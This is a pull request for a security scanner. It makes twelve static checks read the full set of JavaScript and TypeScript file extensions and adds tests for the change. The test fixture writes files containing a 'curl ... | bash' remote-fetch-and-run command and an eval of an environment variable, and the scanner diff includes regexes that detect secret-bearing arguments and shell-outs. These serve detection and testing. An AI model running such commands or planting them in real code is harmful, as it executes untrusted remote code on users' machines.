### PR TITLE
Scan the whole JavaScript family in the static checks, not four spellings of it

### DIFF
--- a/__tests__/hardening/static-check-source-extensions.test.ts
+++ b/__tests__/hardening/static-check-source-extensions.test.ts
@@ -1,0 +1,151 @@
+/**
+ * #414 — the static checks in `scanner.ts` enumerated file extensions by hand at
+ * twelve JS-family call sites, in four different spellings, so whether a check
+ * read your file depended on which check it was.
+ *
+ *   ['.ts', '.js']                    checkNemoClawPatterns
+ *   ['.ts', '.js', '.mjs']            seven sites
+ *   ['.ts', '.js', '.py', '.mjs']     two sites
+ *   ['.ts', '.js', '.md', '.txt']     one site
+ *
+ * The sharpest sat three lines apart in `checkNemoClawPatterns`, whose docstring
+ * says it detects "unsafe installs, missing digest verification, injection
+ * vectors, secret leaks":
+ *
+ *   const shFiles   = walkDirectory(targetDir, ['.sh'], 0, 5);
+ *   const tsJsFiles = walkDirectory(targetDir, ['.ts', '.js'], 0, 5);
+ *
+ * Measured on published 0.31.0, identical content in two files:
+ *
+ *   scripts/alpha.js    CRITICAL eval(), CRITICAL secret, HIGH credentials
+ *   scripts/beta.mjs    nothing
+ *
+ * This is the sibling of #412/#413, which fixed the SEMANTIC compile set. That
+ * one made `.mjs` reach NanoMind; this one makes it reach the static checks.
+ *
+ * TWO LAYERS, following the shape #413 established, because neither is enough:
+ *
+ *   Contract   — the table below is authored HERE and compared against the
+ *                scanner's constant. Not derived from the code under test, so
+ *                deleting `.mjs` from the constant fails it. Runs in CI, which
+ *                is where a silent re-omission would land.
+ *   End-to-end — a hazard really is reported in a `.mjs` by the built CLI.
+ *                Proves the walks actually consult the constant, which the
+ *                contract layer cannot. Needs `dist/`, so it self-skips.
+ *
+ * The NEGATIVE CONTROL is load-bearing in both. Without it, a scanner that read
+ * every file regardless of extension would satisfy every positive case here.
+ */
+import { describe, it, expect, beforeAll } from 'vitest';
+import { spawnSync } from 'node:child_process';
+import { existsSync, mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import { JS_FAMILY_EXTENSIONS } from '../../src/hardening/scanner';
+import { assertDistFreshIfPresent } from '../helpers/dist-freshness';
+
+/**
+ * The JavaScript family, authored as the contract. Deliberately NOT imported
+ * from the thing under test for its own definition: a list read out of the code
+ * being checked cannot fail when that code is wrong.
+ *
+ * Adding a language variant to the scanner means adding a row here. Removing one
+ * then becomes a visible decision rather than a silent omission, which is the
+ * entire defect this file exists for.
+ */
+const MUST_BE_SCANNED = ['.ts', '.js', '.mjs', '.cjs', '.tsx', '.jsx'] as const;
+
+/**
+ * Extensions that must NOT be swept into the JS family. These are not "files we
+ * ignore" — several are scanned by their own single-language walks. They are
+ * here so that widening the constant into a general "every source file" list
+ * fails, because a shell check handed a `.tsx` learns nothing and costs time.
+ */
+const MUST_NOT_BE_IN_JS_FAMILY = ['.sh', '.py', '.yaml', '.yml', '.md', '.txt', '.json', '.bin'] as const;
+
+describe('#414 static-check source extensions: contract', () => {
+  it('covers every JavaScript-family extension', () => {
+    for (const ext of MUST_BE_SCANNED) {
+      expect(
+        (JS_FAMILY_EXTENSIONS as readonly string[]).includes(ext),
+        `${ext} is missing from JS_FAMILY_EXTENSIONS, so every static check that ` +
+          `walks the JS family stops reading ${ext} files while still reporting a score`,
+      ).toBe(true);
+    }
+  });
+
+  it('is exactly the JavaScript family and has not been widened into everything', () => {
+    for (const ext of MUST_NOT_BE_IN_JS_FAMILY) {
+      expect(
+        (JS_FAMILY_EXTENSIONS as readonly string[]).includes(ext),
+        `${ext} was added to JS_FAMILY_EXTENSIONS. Single-language walks keep their ` +
+          `own arrays on purpose; widening this one hands shell and Python checks files ` +
+          `they cannot read.`,
+      ).toBe(false);
+    }
+    expect([...JS_FAMILY_EXTENSIONS].sort()).toEqual([...MUST_BE_SCANNED].sort());
+  });
+
+  it('leaves no hand-written JS-family array behind in the scanner', async () => {
+    // The defect was not one bad list, it was twelve independent ones. A new
+    // call site written the old way reintroduces it, and only a source-level
+    // check catches that before it ships.
+    const { readFile } = await import('node:fs/promises');
+    const source = await readFile(join(__dirname, '../../src/hardening/scanner.ts'), 'utf8');
+    const handWritten = source
+      .split('\n')
+      .map((line, i) => [i + 1, line] as const)
+      .filter(([, line]) => /walkDirectory\([^)]*\['\.ts'/.test(line))
+      .filter(([, line]) => !line.trim().startsWith('*') && !line.trim().startsWith('//'));
+    expect(
+      handWritten.map(([n, l]) => `${n}: ${l.trim()}`),
+      'a walkDirectory call is enumerating the JS family by hand again; use JS_FAMILY_EXTENSIONS',
+    ).toEqual([]);
+  });
+});
+
+describe('#414 static-check source extensions: end to end', () => {
+  const cli = join(__dirname, '../../dist/cli.js');
+  const built = existsSync(cli);
+
+  // Required of every suite that spawns the built CLI, and enforced by
+  // __tests__/harness/spawn-suites-assert-freshness.test.ts, which caught this
+  // file for omitting it. Without it this suite would spawn the PREVIOUS binary
+  // and report a pass for source it never ran, which is the same shape as the
+  // defect the whole change is about.
+  beforeAll(assertDistFreshIfPresent);
+
+  it.skipIf(!built)('reports a hazard in .mjs and .cjs, not only in .js', () => {
+    const root = mkdtempSync(join(tmpdir(), 'hma-414-'));
+    try {
+      mkdirSync(join(root, 'scripts'), { recursive: true });
+      writeFileSync(join(root, 'package.json'), '{"name":"p","version":"0.0.1"}\n');
+      // Distinct payload per file, so a single finding cannot be mistaken for
+      // several through deduplication.
+      const body = (tag: string) =>
+        `const { execSync } = require("child_process");\n` +
+        `execSync("curl -sL http://example.com/${tag}.sh | bash");\n` +
+        `eval(process.env.PAYLOAD_${tag.toUpperCase()});\n`;
+      for (const [name, tag] of [['alpha.js', 'alpha'], ['beta.mjs', 'beta'], ['gamma.cjs', 'gamma']]) {
+        writeFileSync(join(root, 'scripts', name), body(tag));
+      }
+      // Negative control: identical hazard in an extension nothing should read.
+      writeFileSync(join(root, 'scripts', 'delta.bin'), body('delta'));
+
+      const run = spawnSync(process.execPath, [cli, 'secure', '--ci', '--verbose'], {
+        cwd: root,
+        encoding: 'utf8',
+      });
+      const output = `${run.stdout ?? ''}${run.stderr ?? ''}`;
+
+      expect(output, 'the .js baseline stopped being reported, so this test proves nothing')
+        .toMatch(/alpha\.js/);
+      expect(output, '.mjs is not reaching the static checks (#414)').toMatch(/beta\.mjs/);
+      expect(output, '.cjs is not reaching the static checks (#414)').toMatch(/gamma\.cjs/);
+      expect(output, 'the .bin negative control was read, so extension gating is not happening at all')
+        .not.toMatch(/delta\.bin/);
+    } finally {
+      rmSync(root, { recursive: true, force: true });
+    }
+  });
+});

--- a/src/hardening/scanner.ts
+++ b/src/hardening/scanner.ts
@@ -63,6 +63,40 @@ import {
 const BACKUP_MANIFEST_VERSION = 2;
 
 /** A file a fix stage actually created, with the hash of what it wrote. */
+/**
+ * Every extension the JavaScript/TypeScript family uses, as ONE list.
+ *
+ * #414. `walkDirectory` was called with a hand-written extension array at each
+ * of twelve JS-family sites, in four different spellings: `['.ts', '.js']`,
+ * `['.ts', '.js', '.mjs']`, `['.ts', '.js', '.py', '.mjs']` and
+ * `['.ts', '.js', '.md', '.txt']`. Whether a check read your file depended on
+ * which check it was.
+ *
+ * The sharpest case sat three lines apart inside `checkNemoClawPatterns`, whose
+ * own docstring says it detects "unsafe installs, missing digest verification,
+ * injection vectors, secret leaks":
+ *
+ *   const shFiles   = walkDirectory(targetDir, ['.sh'], 0, 5);
+ *   const tsJsFiles = walkDirectory(targetDir, ['.ts', '.js'], 0, 5);
+ *
+ * Measured on 0.31.0 against a consumer repo, as a control: identical hazards
+ * (an `sk-ant-api03` shaped key, `child_process.exec`, and a curl-pipe-to-sh)
+ * produced 2 CRITICALs from the `.sh` and NOTHING from the `.mjs`, in the same
+ * run, from the same check group, scoring 98/100. #413 fixed the semantic
+ * compile set, so those files reach NanoMind; this is the static half.
+ *
+ * `.mjs` matters more than the count suggests: it is the standard extension for
+ * build, release and deploy tooling, which is where the credentials and the
+ * shell-outs live.
+ *
+ * NOT a general "source file" list. Walks that are deliberately single-language
+ * keep their own arrays and MUST NOT be widened to this: `['.sh']` for shell
+ * checks, `['.py']` for Python, `['.yaml', '.yml']` for workflow parsing. A
+ * check that only understands shell learns nothing from being handed a `.tsx`,
+ * and widening it would cost scan time and invite false positives.
+ */
+export const JS_FAMILY_EXTENSIONS = ['.ts', '.js', '.mjs', '.cjs', '.tsx', '.jsx'] as const;
+
 export interface CreatedFileRecord {
   /** Path relative to the scan target. */
   path: string;
@@ -12381,7 +12415,7 @@ dist/
       const srcDir = path.join(targetDir, 'src');
       const srcExists = await fs.access(srcDir).then(() => true).catch(() => false);
       if (srcExists) {
-        const files = await this.walkDirectory(srcDir, ['.ts', '.js', '.py', '.mjs']);
+        const files = await this.walkDirectory(srcDir, [...JS_FAMILY_EXTENSIONS, '.py']);
         for (const file of files.slice(0, 50)) {
           try {
             const content = await fs.readFile(file, 'utf-8');
@@ -12492,7 +12526,7 @@ dist/
       const srcDir = path.join(targetDir, 'src');
       const srcExists = await fs.access(srcDir).then(() => true).catch(() => false);
       if (srcExists) {
-        const files = await this.walkDirectory(srcDir, ['.ts', '.js', '.py', '.mjs']);
+        const files = await this.walkDirectory(srcDir, [...JS_FAMILY_EXTENSIONS, '.py']);
         for (const file of files.slice(0, 50)) {
           try {
             const content = await fs.readFile(file, 'utf-8');
@@ -12860,7 +12894,7 @@ dist/
       const skillsDir = path.join(targetDir, 'skills');
       const dirExists = await fs.access(skillsDir).then(() => true).catch(() => false);
       if (dirExists) {
-        const files = await this.walkDirectory(skillsDir, ['.ts', '.js', '.py', '.md']);
+        const files = await this.walkDirectory(skillsDir, [...JS_FAMILY_EXTENSIONS, '.py', '.md']);
         for (const file of files.slice(0, 30)) {
           try {
             const content = await fs.readFile(file, 'utf-8');
@@ -13394,7 +13428,7 @@ dist/
 
     // Collect source files by extension (max depth 5, skips node_modules/.git/dist/build)
     const shFiles = await this.walkDirectory(targetDir, ['.sh'], 0, 5);
-    const tsJsFiles = await this.walkDirectory(targetDir, ['.ts', '.js'], 0, 5);
+    const tsJsFiles = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 5);
     const pyFiles = await this.walkDirectory(targetDir, ['.py'], 0, 5);
     const yamlFiles = await this.walkDirectory(targetDir, ['.yaml', '.yml'], 0, 5);
 
@@ -14719,7 +14753,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     // Match exec( or execSync( followed by a backtick (template literal)
     // Do NOT match execFile or execFileSync (those use array args, safe)
@@ -14817,7 +14851,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     const pattern = /--(token|password|api[_-]?key|secret|auth)\s*[=\s]\s*[`$"']\s*\$?\{?|["']--(token|password|api[_-]?key|secret|auth)["']/g;
 
@@ -14870,7 +14904,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     const pattern = /if\s*\(\s*(digest|hash|checksum|signature|integrity)\s*&&/g;
 
@@ -14918,7 +14952,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     for (const file of files.slice(0, 100)) {
       try {
@@ -15124,7 +15158,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     const spreadPattern = /env:\s*\{\s*\.\.\.process\.env/g;
     const directPattern = /\benv:\s*process\.env\b/g;
@@ -15374,7 +15408,7 @@ dist/
     const findings: SecurityFinding[] = [];
 
     // Path 1: Look for system-prompt files that load both soul and skill content
-    const promptFiles = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const promptFiles = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
     const targetFiles = promptFiles.filter(f => {
       const name = path.basename(f).toLowerCase();
       return name.includes('system-prompt') || name.includes('systemprompt') ||
@@ -15746,7 +15780,7 @@ dist/
     _autoFix: boolean
   ): Promise<SecurityFinding[]> {
     const findings: SecurityFinding[] = [];
-    const files = await this.walkDirectory(targetDir, ['.ts', '.js', '.mjs'], 0, 2);
+    const files = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS], 0, 2);
 
     // Look for store/save/persist calls with text/content parameter (method or function)
     const storePattern = /(?:\.|^|\s|\()(store|save|persist|insert|upsert|push)\s*\(\s*\{[^}]*(text|content|message|input)\b/g;
@@ -15872,7 +15906,7 @@ dist/
     }
 
     // Check for system-prompt source files
-    const srcFiles = await this.walkDirectory(targetDir, ['.ts', '.js', '.md', '.txt'], 0, 2);
+    const srcFiles = await this.walkDirectory(targetDir, [...JS_FAMILY_EXTENSIONS, '.md', '.txt'], 0, 2);
     for (const file of srcFiles) {
       const basename = path.basename(file).toLowerCase();
       if (promptFilePatterns.some(p => basename === p.toLowerCase())) {


### PR DESCRIPTION
Closes the static half of #414. Measured from a consumer repo, with a control, and posted
to that issue before this branch existed.

#413 fixed the SEMANTIC compile set, so `.mjs` reaches NanoMind. The static checks in
`scanner.ts` still enumerated extensions by hand at twelve JS-family call sites in four
different spellings, so whether a check read your file depended on which check it was:

| spelling | sites |
|---|---|
| `['.ts', '.js']` | `checkNemoClawPatterns` |
| `['.ts', '.js', '.mjs']` | seven |
| `['.ts', '.js', '.py', '.mjs']` | two |
| `['.ts', '.js', '.md', '.txt']` | one |

The sharpest sat three lines apart in one function, whose own docstring says it detects
"unsafe installs, missing digest verification, injection vectors, secret leaks":

```ts
const shFiles   = walkDirectory(targetDir, ['.sh'], 0, 5);
const tsJsFiles = walkDirectory(targetDir, ['.ts', '.js'], 0, 5);
```

## The control

Identical content in two files, published 0.31.0 vs this build:

| | pre | post |
|---|---|---|
| `scripts/alpha.js` cited | yes | yes |
| `scripts/beta.mjs` cited | **no** | **yes** |
| fixture score | 64/100 | 54/100 |

## No score movement on real repositories

Measured before and after, because a detection change on our own scanner has to be:

| repo | pre | post |
|---|---|---|
| csnp.org | 88/100 | 88/100 |
| csnp-connect | 90/100 | 90/100 |
| hackmyagent self-scan | 100/100 | 100/100 |

The union of files read is also unchanged, and that is expected rather than suspicious:
`.mjs` was already read by seven of the twelve walks, so what changed is *which checks*
read it, not how many files are opened. The synthetic control is what proves the widening
is real. Worth noting separately that `N files read by static checks` counts the union and
therefore cannot show this class of gap at all.

## Scope, and what is deliberately not widened

One exported constant feeds all twelve JS-family walks. Single-language walks keep their
own arrays: `['.sh']`, `['.py']`, `['.yaml','.yml']`. A shell check handed a `.tsx` learns
nothing and costs time, so the constant is the JS family and not "every source file". The
contract test pins that from both directions.

## Tests

Two layers, following the shape #413 established:

- **Contract** — the extension table is authored in the test file, not imported from the
  code under test, so removing `.mjs` fails it. Runs in CI.
- **End-to-end** — spawns the built CLI and asserts a hazard is reported in `.mjs` and
  `.cjs`. Proves the walks actually consult the constant.
- A third test fails if any `walkDirectory` call enumerates the JS family by hand again,
  because the defect was twelve independent lists rather than one bad one.

Both layers carry a `.bin` negative control. Without it, a scanner that simply read every
file would satisfy every positive case.

Three mutations, each killed by the assertion named for it: drop `.mjs`, widen to include
`.sh`, restore one hand-written array.

Full suite: 275 files, 3880 tests, green. `__tests__/harness/spawn-suites-assert-freshness`
caught this PR's own end-to-end suite for spawning `dist/cli.js` without asserting build
freshness, which is fixed here; that guard is doing exactly its job.

## Known remainder, measured and not fixed here

A hardcoded secret in a `.mjs` is still not reported while the same secret in a `.js` is,
with distinct values so it is not deduplication. That finding comes from the NanoMind
credential analyzer, whose compile set already contains `.mjs`, so it is a routing question
rather than an extension one and belongs with the artifact-classification work
(the `unclassified artifacts reach 2 of 7 analyzers` line of investigation).
